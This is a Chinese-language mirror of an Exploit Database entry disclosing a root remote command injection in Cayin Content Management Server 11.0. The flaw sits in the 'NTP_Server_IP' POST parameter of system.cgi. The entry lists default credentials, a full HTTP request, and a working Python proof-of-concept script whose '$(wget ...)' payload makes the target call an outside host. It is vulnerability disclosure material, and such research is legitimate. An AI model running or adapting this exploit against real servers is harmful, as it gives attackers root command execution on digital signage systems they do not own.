Cayin Content Management Server 11.0 – Remote Command Injection (root)

• Exploit Database
• 124 阅读

• 作者： LiquidWorm
  日期： 2020-06-04
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/48553/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140

  # Title: Cayin Content Management Server 11.0 - Remote Command Injection (root) # Author:LiquidWorm # Date: 2020-06-04 # Vendor: https://www.cayintech.com # CVE:N/A Cayin Content Management Server 11.0 Root Remote Command Injection     Vendor: CAYIN Technology Co., Ltd. Product web page: https://www.cayintech.com Affected version: CMS-SE v11.0 Build 19179 CMS-SE v11.0 Build 19025 CMS-SE v11.0 Build 18325 CMS Station (CMS-SE-LXC) CMS-60 v11.0 Build 19025 CMS-40 v9.0 Build 14197 CMS-40 v9.0 Build 14099 CMS-40 v9.0 Build 14093 CMS-20 v9.0 Build 14197 CMS-20 v9.0 Build 14092 CMS v8.2 Build 12199 CMS v8.0 Build 11175 CMS v7.5 Build 11175   Summary: CAYIN Technology provides Digital Signage solutions, including media players, servers, and software designed for the DOOH (Digital Out-of-home) networks. We develop industrial-grade digital signage appliances and tailored services so you don't have to do the hard work.   Desc: CAYIN CMS suffers from an authenticated OS semi-blind command injection vulnerability using default credentials. This can be exploited to inject and execute arbitrary shell commands as the root user through the 'NTP_Server_IP' HTTP POST parameter in system.cgi page.   Tested on: Apache/1.3.42 (Unix)     Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience     Advisory ID: ZSL-2020-5570 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5570.php     15.05.2020   ---     Session created with default credentials (webadmin:bctvadmin).   HTTP POST Request: -----------------   POST /cgi-bin/system.cgi HTTP/1.1 Host: 192.168.1.3 Content-Length: 201 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Smith Origin: http://192.168.1.3 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.1.3/cgi-bin/system.cgi Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: cy_lang=ZH_TW; cy_us=67176fd7d3d05812008; cy_en=c8bef8607e54c99059cc6a36da982f9c009; WEB_STR_RC_MGR=RC_MGR_WEB_PLAYLIST; WEB_STR_SYSTEM=SYSTEM_SETTING; cy_cgi_tp=1591206269_15957 Connection: close     save_system: 1 system_date: 2020/5/1606:36:48 TIMEZONE: 49 NTP_Service: 1 NTP_Server_IP: $(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk) TEST_NTP: 測試 reboot1: 1 reboot_sel1: 4 reboot_sel2: 1 reboot_sel3: 1 font_list: ZH_TW     Request recorder @ ZSL: -----------------------   Origin of HTTP request: 192.168.1.3:61347 HTTP GET request to vrfy.zeroscience.mk:   GET / HTTP/1.0 User-Agent: MyVoiceIsMyPassportVerifyMe Host: vrfy.zeroscience.mk Accept: */* Connection: Keep-Alive     PoC script: -----------   import requests   url = "http://192.168.1.3:80/cgi-bin/system.cgi"   cookies = {"cy_lang": "ZH_TW", "cy_us": "67176fd7d3d05812008", "cy_en": "c8bef8607e54c99059cc6a36da982f9c009", "WEB_STR_RC_MGR": "RC_MGR_WEB_PLAYLIST", "WEB_STR_SYSTEM": "SYSTEM_SETTING", "cy_cgi_tp": "1591206269_15957"}   headers = {"Cache-Control": "max-age=0", "Origin": "http://192.168.1.3", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Smith", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.1.3/cgi-bin/system.cgi", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}   data = {"save_system": "1", "system_date": "2020/5/1606:36:48", "TIMEZONE": "49", "NTP_Service": "1", "NTP_Server_IP": "$(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk)", # <code>cmd</code> or &cmd& "TEST_NTP": "\xe6\xb8\xac\xe8\xa9\xa6", "reboot1": "1", "reboot_sel1": "4", "reboot_sel2": "1", "reboot_sel3": "1", "font_list": "ZH_TW"}   requests.post(url, headers=headers, cookies=cookies, data=data)